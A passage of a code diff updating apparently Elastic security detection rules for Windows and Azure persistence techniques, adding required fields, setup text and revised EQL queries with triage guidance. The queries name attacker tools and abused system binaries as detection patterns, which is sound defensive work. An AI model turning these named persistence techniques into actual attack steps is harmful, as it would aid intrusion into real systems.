registry and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Some Microsoft executables will reference the LocalServer32 registry key value for the location of external COM objects.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "registry where\n (registry.path : \"HK*}\\\\InprocServer32\\\\\" and registry.data.strings: (\"scrobj.dll\", \"C:\\\\*\\\\scrobj.dll\") and\n not registry.path : \"*\\\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\\\*\")\n or\n /* in general COM Registry changes on Users Hive is less noisy and worth alerting */\n (registry.path : (\"HKEY_USERS\\\\*Classes\\\\*\\\\InprocServer32\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\LocalServer32\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\DelegateExecute\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\TreatAs\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\CLSID\\\\*\\\\ScriptletURL\\\\\") and\n not (process.executable : \"?:\\\\Program Files*\\\\Veeam\\\\Backup and Replication\\\\Console\\\\veeam.backup.shell.exe\" and\n registry.path : \"HKEY_USERS\\\\S-1-5-21-*_Classes\\\\CLSID\\\\*\\\\LocalServer32\\\\\") and\n /* not necessary but good for filtering privileged installations */\n user.domain != \"NT AUTHORITY\"\n ) and\n /* removes false-positives generated by OneDrive and Teams */\n not process.name : (\"OneDrive.exe\",\"OneDriveSetup.exe\",\"FileSyncConfig.exe\",\"Teams.exe\") and\n /* Teams DLL loaded by regsvr */\n not (process.name: \"regsvr32.exe\" and\n registry.data.strings : \"*Microsoft.Teams.*.dll\")\n", "references": [ "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" ], + "required_fields": [ + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_image_load_scheduled_task_ms_office.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_image_load_scheduled_task_ms_office.json index 6798f8986ae5f..fd8f98d16a82e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_image_load_scheduled_task_ms_office.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_image_load_scheduled_task_ms_office.json @@ -12,14 +12,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Image Load (taskschd.dll) from MS Office", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "library where process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n event.action : \"load\" and\n event.category : \"library\" and\n dll.name : \"taskschd.dll\"\n", + "note": "", + "query": "any where\n (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\")\n", "references": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -47,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_scheduled_task_runtime.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_scheduled_task_runtime.json index d85587bc57856..dd84aa829f797 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_scheduled_task_runtime.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_scheduled_task_runtime.json @@ -15,10 +15,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Execution via Scheduled Task", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type == \"start\" and\n /* Schedule service cmdline on Win10+ */\n process.parent.name : \"svchost.exe\" and process.parent.args : \"Schedule\" and\n /* add suspicious programs here */\n process.pe.original_file_name in\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) and\n /* add suspicious paths here */\n process.args : (\n \"C:\\\\Users\\\\*\",\n \"C:\\\\ProgramData\\\\*\", \n \"C:\\\\Windows\\\\Temp\\\\*\", \n \"C:\\\\Windows\\\\Tasks\\\\*\", \n \"C:\\\\PerfLogs\\\\*\", \n \"C:\\\\Intel\\\\*\", \n \"C:\\\\Windows\\\\Debug\\\\*\", \n \"C:\\\\HP\\\\*\")\n", + "note": "", + "query": "process where event.type == \"start\" and\n /* Schedule service cmdline on Win10+ */\n process.parent.name : \"svchost.exe\" and process.parent.args : \"Schedule\" and\n /* add suspicious programs here */\n process.pe.original_file_name in\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) and\n /* add suspicious paths here */\n process.args : (\n \"C:\\\\Users\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"C:\\\\Windows\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\Windows\\\\Debug\\\\*\",\n \"C:\\\\HP\\\\*\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_service_created_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_service_created_registry.json index 11e7195a8de4b..2701aa5b0d30a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_service_created_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_service_created_registry.json @@ -11,6 +11,18 @@ "license": "Elastic License v2", "name": "Suspicious ImagePath Service Creation", "query": "registry where registry.path : \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\" and\n /* add suspicious registry ImagePath values here */\n registry.data.strings : (\"%COMSPEC%*\", \"*\\\\.\\\\pipe\\\\*\")\n", + "required_fields": [ + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "36a8e048-d888-4f61-a8b9-0f9e2e40f317", "severity": "high", @@ -47,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_system_shells_via_services.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_system_shells_via_services.json index d5f1379a835e9..19773777eee1d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_system_shells_via_services.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_system_shells_via_services.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "System Shells via Services", - "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from\nadministrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to\nservice activities (for example, 4697 and/or 7045).\n - Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive\n(B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n \n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", + "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from\nadministrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to\nservice activities (for example, 4697 and/or 7045).\n - Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive\n(B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n\n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "0022d47d-39c7-4f69-a232-4fe9dc7a3acd", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_time_provider_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_time_provider_mod.json index 8c4037fd44893..0adc5d22a24f2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_time_provider_mod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_time_provider_mod.json @@ -14,6 +14,23 @@ "references": [ "https://pentestlab.blog/2019/10/22/persistence-time-providers/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204", "severity": "medium", @@ -50,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_added_to_privileged_group_ad.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_added_to_privileged_group_ad.json index 3558fcd594e4a..f1a4d9b5b7bea 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_added_to_privileged_group_ad.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_added_to_privileged_group_ad.json @@ -12,13 +12,26 @@ "language": "eql", "license": "Elastic License v2", "name": "User Added to Privileged Group in Active Directory", - "note": "## Triage and analysis\n\n### Investigating User Added to Privileged Group in Active Directory\n\nPrivileged accounts and groups in Active Directory are those to which powerful rights, privileges, and permissions are\ngranted that allow them to perform nearly any action in Active Directory and on domain-joined systems.\n\nAttackers can add users to privileged groups to maintain a level of access if their other privileged accounts are\nuncovered by the security team. This allows them to keep operating after the security team discovers abused accounts.\n\nThis rule monitors events related to a user being added to a privileged group.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should manage members of this group.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This attack abuses a legitimate Active Directory mechanism, so it is important to determine whether the activity is\nlegitimate, if the administrator is authorized to perform this operation, and if there is a need to grant the account\nthis level of privilege.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the admin is not aware of the operation, activate your Active Directory incident response plan.\n- If the user does not need the administrator privileges, remove the account from the privileged group.\n- Review the privileges of the administrator account that performed the action.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating User Added to Privileged Group in Active Directory\n\nPrivileged accounts and groups in Active Directory are those to which powerful rights, privileges, and permissions are\ngranted that allow them to perform nearly any action in Active Directory and on domain-joined systems.\n\nAttackers can add users to privileged groups to maintain a level of access if their other privileged accounts are\nuncovered by the security team. This allows them to keep operating after the security team discovers abused accounts.\n\nThis rule monitors events related to a user being added to a privileged group.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should manage members of this group.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This attack abuses a legitimate Active Directory mechanism, so it is important to determine whether the activity is\nlegitimate, if the administrator is authorized to perform this operation, and if there is a need to grant the account\nthis level of privilege.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the admin is not aware of the operation, activate your Active Directory incident response plan.\n- If the user does not need the administrator privileges, remove the account from the privileged group.\n- Review the privileges of the administrator account that performed the action.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "iam where event.action == \"added-member-to-group\" and\n group.name : (\"Admin*\",\n \"Local Administrators\",\n \"Domain Admins\",\n \"Enterprise Admins\",\n \"Backup Admins\",\n \"Schema Admins\",\n \"DnsAdmins\",\n \"Exchange Organization Administrators\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_creation.json index 7cfbc30fca454..950324d76f884 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_creation.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "User Account Creation", - "note": "## Triage and analysis\n\n### Investigating User Account Creation\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `net.exe` to create new accounts.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. Before\ninvestigating further, verify that this activity is not benign.\n\n### Related rules\n\n- Creation of a Hidden Local User Account - 2edc8076-291e-41e9-81e4-e3fcbc97ae5e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating User Account Creation\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `net.exe` to create new accounts.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. Before\ninvestigating further, verify that this activity is not benign.\n\n### Related rules\n\n- Creation of a Hidden Local User Account - 2edc8076-291e-41e9-81e4-e3fcbc97ae5e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : (\"net.exe\", \"net1.exe\") and\n not process.parent.name : \"net.exe\" and\n (process.args : \"user\" and process.args : (\"/ad\", \"/add\"))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_application.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_application.json index 1d0990e951925..9037915aba8c9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_application.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_application.json @@ -11,10 +11,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "User Added as Owner for Azure Application", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add owner to application\" and event.outcome:(Success or success)\n", + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "774f5e28-7b75-4a58-b94e-41bf060fdd86", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -43,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_service_principal.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_service_principal.json index b68b4826bc4cf..36d8fb57cefff 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_service_principal.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_service_principal.json @@ -11,13 +11,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "User Added as Owner for Azure Service Principal", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add owner to service principal\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/active-directory/develop/app-objects-and-service-principals" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "38e5acdd-5f20-4d99-8fe4-f0a1a592077f", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -46,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_application_shimming.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_application_shimming.json index cac0497455b68..fbf9bb1682bbc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_application_shimming.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_application_shimming.json @@ -12,10 +12,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Application Shimming via Sdbinst", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for 